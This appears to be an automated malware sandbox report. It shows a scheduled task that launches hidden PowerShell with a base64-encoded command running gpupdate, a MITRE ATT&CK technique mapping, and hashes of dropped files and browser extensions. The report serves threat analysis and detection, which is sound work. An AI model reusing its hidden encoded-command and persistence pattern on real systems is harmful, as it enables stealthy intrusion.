taskeng.exe {A606DB62-0B42-4592-84B8-CF312C4F8E06} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
1⤵
PID:2204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1684

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1940

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2560

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\YRaAzzcUU\gzNYcDf.xml

Filesize
2KB

MD5
56b5da3bace3fcad9056ffc07e3b0517

SHA1
53c05a1213b0e4f70efc739e5e93bb812358b7da

SHA256
a069d816d49460470e2556b29232cb5dee9bc97240e56ac36ca466fdb8effd5f

SHA512
5dd11a009e44586286e6aeb360cd205a1db159c1b454c5f29e59b855071e70d8a970b5f260c4a6e29262519d1febd1c3ee134eeb83805d38448763cb4b9f2618

Download Submit
C:\Program Files (x86)\bcDGOSnszpTU2\kmLRzko.xml

Filesize
2KB

MD5
ceed2f22ac4a273aa61a33192aa66a7f

SHA1
ddffe4fe6f27dc38d9ca14b894f50494d40c5d48

SHA256
7a39fce186a34ff006f88f437d5cc1a2db9c897009b04aa12cedfa8a55a0e692

SHA512
01bb9758e4adfb733432c3e98f32536737bd82dbdb9a2f9c1363a1381bbde4d305e5b70905544c6c4cb3bd0ec58b19ffb492e8c541a85b62c02f45a75159e391

Download Submit
C:\Program Files (x86)\nadwbZkmFdleQDJCsLR\topQvcg.xml

Filesize
2KB

MD5
392a501e84ee149717e444e841e8a5a0

SHA1
1ecbc47525a841f72a5b179b90210b78976a5e09

SHA256
6c248b76b91b696e53adc904fbc94241a12959b5da7599d81bd2dc5cef0a79c5

SHA512
3707b57b97efcafd506da401feff5c3084b02e7a92c199c3e8eb3950ddfd1302f8fd96fc51b6a11cd98f857beff9f37049b9581748ee0d126de952d1661153fc

Download Submit
C:\Program Files (x86)\uulhOemmgIOXC\AdUBiDe.xml

Filesize
2KB

MD5
11a18561245c6f68128a5e4768d10378

SHA1
ce53ec3912c4936047cfeff4f17712a9be1206eb

SHA256
248bbc294e59ab126547a4dc60ea83360916a1f721269ec3d0a465bee96a8688

SHA512
e3614149426ce2d848f4a883247685942f1c6a7cdd837edd0c99c7aa770f442dee3840b1fc15c5a856d484afa412840463e097c44f6880859511bb2d465ddca2

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{7A64B70D-E788-4CA6-8846-D267851C786F}.xpi

Filesize
644KB

MD5
da794924cd9634cf210b7d437b21151b

SHA1
fbe26fa25acb8b7f40a3a4f5f102282c9fd87897

SHA256
c82b4ced22136c3b6573b7fc84b8d692500547ad6e75450e1af96c6f2d65bbe3

SHA512
924d36cf26bccc1ff137bbfaea9e7bf3de08e8a1b2711a361611ba113f1ce793df39fd861bdb9e6321c9ddd2565625575fae1fc4ac41fb361d197be9c7012129

Download Submit
C:\ProgramData\HHFPPRMXrrQnklVB\czLcqAK.xml

Filesize
2KB

MD5
ac77d57f260518bb77576a81c5313df2

SHA1
098c3ff7b5e6fa469e54003e693d2b82bd764d98

SHA256
a3bf4c3ecbf9c830c6b209776420286a0cf6884a0db0a626664ff100ae053ff8

SHA512
a8528d0739c5392954653e490e4ab67e35ae2c2dae2895c0134d3b3ec919290b2b7b492e6624166325a65e32bcc768be49da22e6681b7341a8159139c8ed1d65

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eggkmbghbmjmbdjloifaklghfiecjbnk\1.1_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eggkmbghbmjmbdjloifaklghfiecjbnk\1.1_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5c3d86011c46371ae0d70bb2c6fa5bc1

SHA1
cf26b62c1729c99f83b8b5593a69b1eeefadca34

SHA256
cdc0116deef1c4af9db43c3cba85b53c24300ee273be46a2655339b47848e2ee

SHA512
9e18d019a39ebb584050da5d95a4bf229942cb5ab6744a8f04aecb0862c2817e0edf0a0d3b383096215a6e45ae7d2ded1536d43595d07cfd7f22e49c03b19627

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ALAOBOCLRFPSKJB7PRFB.temp

Filesize
7KB

MD5
a175b4611b50d4ba1b1e3162e2762b87

SHA1
a8aa1e4989b691f5987d6882ad63b87017364e4c

SHA256
dd07140893eaddeb4a7a84e1d5c053aaa63ca8713082dc6a4edbe24e0d5b7539

SHA512
ad0017de2754167a29e9ec8b1c9a71d589c3009e7dd44534e2880ad3e4ceb0153dd9cfa5761fc6b896bf7156763eab3621ee532a16d8cf1a53fc4bc841faedf1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\THP3Z2WV6PMUSS7WPBCP.temp

Filesize
7KB

MD5
be1cfb8d0558632c0d531c1b4f840834

SHA1
62def5dbaa36de0fef5995c9b19b17e242064335

SHA256
b40009759ef9017ed7d14f06d344161d8b0b3a3f4bd572933fec7d68c76498cc

SHA512
f70a0808d0fa7da713842691e4c0afef9abe1ac14277158a6b6ae04a0cd2c6aa2252ee09064b4e36931f94aee2f8712a65c54e5b25fc343472cd0ceaa21e5f00

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
472660eaa3330651ea563227192cbd53

SHA1
3145c004f7776e556c1b9f247562c5ba81e8c6d0

SHA256
128e8e283818db461b7df31038bac5b35d0b6c92358e23abf508001d0906e19b

SHA512
2f8ff55cb65ed04408330d97e260e6edeb42274049a07906e71725e34faeb8ef33c00c3d5b9013ae3224e79fbf7ca05d2884e8248da86eb27b80651e5e75d8c9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js

Filesize
6KB

MD5
cf759151cfa4512e4fe9f0c1b931fb1b

SHA1
f0106b084de5b782fef1a63a4139585035fa5fe9

SHA256
6862203274bd211359481c1d1891052e30028c0f993edc913e5fb0bcaefd28c5

SHA512
128ff7c1c6a1624a182acb0514146c2743228a46d697f1691aa614a72d276b3537af3fe8697772367ec9f373bb312db3de9e964a39c3d303543f33f69b681bef

Download Submit
C:\Windows\Temp\TEEaErdYmgJnvnOu\hAtwvDBr\qPNMoUgCcqNCxCRM.wsf

Filesize
9KB

MD5
705ca65aa7dcff9d32794418d64a7402

SHA1
9582504b1a9ba997106609d221a57a91f2111b9d

SHA256
164a9344adeb4265fee6aa5ee1a417c50f392e9ef740834e71a876866427c3b0

SHA512
07244c872b7f15f6ebfff91f3287580c492d67dfe1257b2f98b328b55e4bba31b9da373eacd34df5a2d91bc3fe4d13ffe4a7444d15adda60eb1c526348009bc0

Download Submit
memory/316-43-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

Filesize
2.9MB

Download
memory/1740-14-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1740-13-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2236-26-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2236-25-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2280-90-0x0000000001210000-0x0000000001272000-memory.dmp

Filesize
392KB

Download
memory/2280-15-0x0000000001280000-0x000000000192D000-memory.dmp

Filesize
6.7MB

Download
memory/2280-54-0x00000000037D0000-0x0000000003855000-memory.dmp

Filesize
532KB

Download
memory/2280-3-0x0000000010000000-0x00000000105D4000-memory.dmp

Filesize
5.8MB

Download
memory/2280-0-0x0000000001280000-0x000000000192D000-memory.dmp

Filesize
6.7MB

Download